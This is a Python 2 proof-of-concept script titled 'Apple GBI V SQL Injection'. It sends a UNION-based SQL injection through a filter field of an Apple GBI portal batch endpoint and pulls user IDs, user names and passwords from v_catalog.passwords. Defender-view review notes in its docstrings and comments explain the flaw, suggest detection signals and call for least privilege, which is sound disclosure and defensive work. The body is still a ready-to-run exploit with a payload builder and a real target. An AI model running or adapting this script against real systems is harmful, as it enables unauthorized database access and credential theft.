Apple GBI V SQL Injection
import requests, json | |
def doInject(injectionQuery):
    """Post one batch query with ``injectionQuery`` as a filter value and print the rows.

    ``injectionQuery`` is sent unmodified as the only element of the
    ``D_sold_to_cust_Id`` filter. Each returned row's
    ``service_notification_number`` field is printed with the ``$$$``
    separator replaced by spaces. Any exception while parsing or printing
    the response prints ``failed``.

    Review notes (defender view):
    - Rows selected by the caller's text come back in the response, which
      indicates the service concatenates filter values into the SQL text
      instead of binding them as parameters.
    - The ``limit`` value below is SQL text rather than a number, so that
      field appears to reach the statement unvalidated as well. Server-side,
      ``limit``/``offset`` should be parsed as integers and
      ``orderBy``/``orderType`` checked against an allow-list.
    - Filter values containing ``UNION`` or SQL comment tokens are a usable
      detection signal in request logs for this endpoint.
    """
    endpoint = "https://gbiportal-apps-external.apple.com/gsf/partShipment/businessareas/AppleCare/subjectareas/acservice/services/batch"

    # CSRF and Cookie are blank on the page; presumably a valid session is
    # needed for the request to be accepted -- not verifiable from here.
    request_headers = {
        "content-type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
        "CSRF": "",
        "Origin": "https://gbiportal-apps-external-msc.apple.com",
        "Cookie": "",
    }

    filter_values = {
        "D_sold_to_cust_Id": [injectionQuery],
        "D_ship_to_cust_Id": [""],
        "D_ORDER_SHIP_DATE": [""],
        "D_Repair_Type_Cd": [""],
        "D_Order_ID": [""],
        "D_Dispatch_Id": [""],
        "orderBy": ["service_notification_number"],
        "orderType": ["desc"],
        "limit": ["*/*/ limit 5000"],
        "offset": ["0"],
    }

    request_body = {
        "executionType": "parallel",
        "requests": [{
            "queryName": "query_for_table_filter",
            "filters": filter_values,
        }],
    }

    r = requests.post(endpoint, headers=request_headers, json=request_body)

    # Python 2 print statements, as in the original listing.
    try:
        rows = json.loads(r.text)["result"][0]["query_for_table_filter"]
        for row in rows:
            value = row["service_notification_number"].rstrip()
            print value.replace("$$$", " ").encode("utf8")
    except:
        print 'failed'
def getData(columns, table, schema=""):
    """Build the filter value for ``columns`` of ``table`` and pass it to ``doInject``.

    The requested columns are joined with the SQL expression ``||'$$$'||`` so
    that they arrive in a single output column; ``doInject`` later replaces
    the ``$$$`` marker with spaces. ``schema``, when non-empty, is prefixed
    to ``table`` with a dot.

    Review note (defender view): column, table and schema names are formatted
    straight into the string. The query only works if the service's database
    account can read the named table, so restricting that account to the
    reporting tables it needs limits what a flaw of this kind exposes.
    """
    joined_columns = ""
    for name in columns:
        rendered = "{}".format(name)
        if joined_columns == "":
            joined_columns = joined_columns + rendered
        else:
            joined_columns = joined_columns + "||'$$$'||" + rendered

    source_table = "{}.{}".format(schema, table) if schema else table

    # The null padding presumably matches the column count of the original
    # query_for_table_filter result set -- not verifiable from this page.
    query = "-1' UNION all SELECT {},null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM/**/{} /*".format(joined_columns, source_table)
    doInject(query)
# Reads user_id, user_name and password from v_catalog.passwords.
# NOTE(review): v_catalog looks like a Vertica system schema -- confirm. If
# so, the reporting service's database account could read stored credential
# data, which is a least-privilege gap independent of the injection itself.
getData(
    ["user_id", "user_name", "password"],
    table="passwords",
    schema="v_catalog",
)